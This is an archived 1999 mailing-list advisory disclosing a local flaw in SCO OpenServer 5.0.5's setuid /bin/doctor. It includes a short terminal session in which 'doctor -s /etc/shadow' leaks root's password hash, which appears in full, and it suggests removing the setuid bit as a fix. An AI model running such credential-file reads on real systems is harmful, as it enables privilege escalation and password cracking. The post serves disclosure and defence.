SCO OpenServer 5.0.5 /bin/doctor root compromise

[btellier () WEBLEY COM (Brock Tellier)]

Greetings,

INFO:
 There is a local root comprimise in SCO 5.0.5's /bin/doctor 2.0.0e2 and probably others.  By supplying a doctor script 
file you can read the first partial line of any file on the system (good enough for /etc/shadow).  Example:

scobox:/bin$ id
uid=136(btellier),200(users)
scobox:/bin$ uname -a
SCO_SV scobox 3.2 5.0.5 i386
scobox:/bin$ doctor -V
doctor 2.0.0e 2
scobox:/bin$ doctor -s /etc/shadow
doctor: WARNING User message: invalid command name "root:xbfOLR0ekXN/o:10656::"
scobox:/bin$

And so on.

FIX: 
 Just chmod -s until SCO comes out with a fix.  Although I certianly won't be changing it back to suid root anytime 
soon.  If a hole like this exists, there are undoubtedly countless more lurking within.  

Brock Tellier
Systems Administrator
Webley Systems

<!-- body="end" -->
<HR>

<UL>
<LI><STRONG>Next message:</STRONG> Zo0mer: "local telnetd DoS"
<LI><STRONG>Previous message:</STRONG> Bill Royds: "Re: I found this today and iam reporting it to you first!!! (fwd)"
</UL>
<HR>

<SMALL>

This archive was generated by hypermail 2.0b3 
on Thu Sep 09 1999 - 23:40:11 CDT</EM>
</EM>
</SMALL>
</BODY>
</HTML>